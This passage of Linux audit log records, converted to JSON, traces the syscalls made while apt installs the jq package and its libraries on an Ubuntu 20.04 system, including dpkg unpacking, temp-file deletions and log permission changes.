"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.617:441",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.ENtVde",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.621:442",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7617,
"pid": 7618,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt-extracttemp",
"exe": "/usr/bin/apt-extracttemplates",
"key": "delete",
"ARGV": [
"0x7fff6dae5280",
"0x7fff6dae5280",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.cOFLMf",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/perl",
"-w",
"/usr/sbin/dpkg-preconfigure",
"--apt"
],
"launch_time": 1632470477.543,
"ppid": 7611
}
}
{
"ID": "1632470477.625:443",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7618,
"pid": 7620,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x55fcd7bcc270",
"0x55fcd7bc8500",
"0x7fff6dae67c0",
"0x55fcd7bbb0e3"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-extracttemplates",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.549,
"ppid": 7617
}
}
{
"ID": "1632470477.641:444",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7618,
"pid": 7621,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x55fcd7c709a0",
"0x55fcd7c8d780",
"0x7fff6dae67c0",
"0x55fcd7bbb0e3"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt-extracttemplates",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.549,
"ppid": 7617
}
}
{
"ID": "1632470477.661:445",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x24",
"0x1a4",
"0x0",
"0x564c5500b010"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 14166,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.669:446",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 5,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x564c550d6c40",
"0x564c550d6c10",
"0x564c550d68a0",
"0x564c5500b010"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/apt/",
"inode": 11650,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/apt/",
"inode": 11650,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/apt/extended_states.nQDcVW",
"inode": 14166,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/apt/extended_states",
"inode": 7935,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 4,
"name": "/var/lib/apt/extended_states",
"inode": 14166,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.673:447",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c5511a4e0",
"0x1a4",
"0x23",
"0x564c5500b010"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/apt/extended_states",
"inode": 14166,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.673:448",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 92,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550bfb10",
"0x0",
"0x4",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/log/apt/term.log",
"inode": 11694,
"dev": "fd:00",
"mode": "0o100640",
"ouid": 0,
"ogid": 4,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.677:449",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c550bfb10",
"0x1a0",
"0x4",
"0x7f37c18d2ac0"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/log/apt/term.log",
"inode": 11694,
"dev": "fd:00",
"mode": "0o100640",
"ouid": 0,
"ogid": 4,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.677:450",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 90,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "perm_mod",
"ARGV": [
"0x564c55146ce0",
"0x1a4",
"0x1",
"0x1b6"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/var/log/apt/history.log",
"inode": 11740,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470477.681:451",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7622,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c550bf280",
"0x564c55146ce0",
"0x564c550d6b70",
"0x0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--assert-multi-arch"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--assert-multi-arch"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.693:452",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7623,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c550bf280",
"0x564c550bd250",
"0x564c550d6b70",
"0x0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--assert-protected-field"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--assert-protected-field"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.697:453",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c550dc500",
"0x564c5510a0d0",
"0x564c550d6b70",
"0x564c550bd690"
]
},
"EXECVE": {
"argc": 9,
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.705:454",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bc70",
"0x556eba29b840",
"0x0",
"0x556eba297010"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.705:455",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7625,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-split",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.709:456",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7625,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-split",
"exe": "/usr/bin/dpkg-split",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"dpkg-split",
"-Qao",
"/var/lib/dpkg/reassemble.deb",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-split",
"inode": 787056,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.709:457",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba44bca0",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x556eba297010"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/",
"inode": 11655,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.709:458",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7624,
"pid": 7626,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/dpkg-deb",
"nametype": "UNKNOWN",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/cache/apt/archives/libjq1_1.6-1ubuntu0.20.04.1_amd64.deb",
"/var/cache/apt/archives/jq_1.6-1ubuntu0.20.04.1_amd64.deb"
],
"launch_time": 1632470477.697,
"ppid": 7575
}
}
{
"ID": "1632470477.709:459",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7624,
"pid": 7626,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg-deb",
"exe": "/usr/bin/dpkg-deb",
"key": "rootcmd",
"ARGV": [
"0x7ffef7ae40a0",
"0x7ffef7ae4160",
"0x556eba29b570",
"0x7ffef7ae41b0"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"dpkg-deb",
"--control",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/lib/dpkg/tmp.ci"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg-deb",
"inode": 787052,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
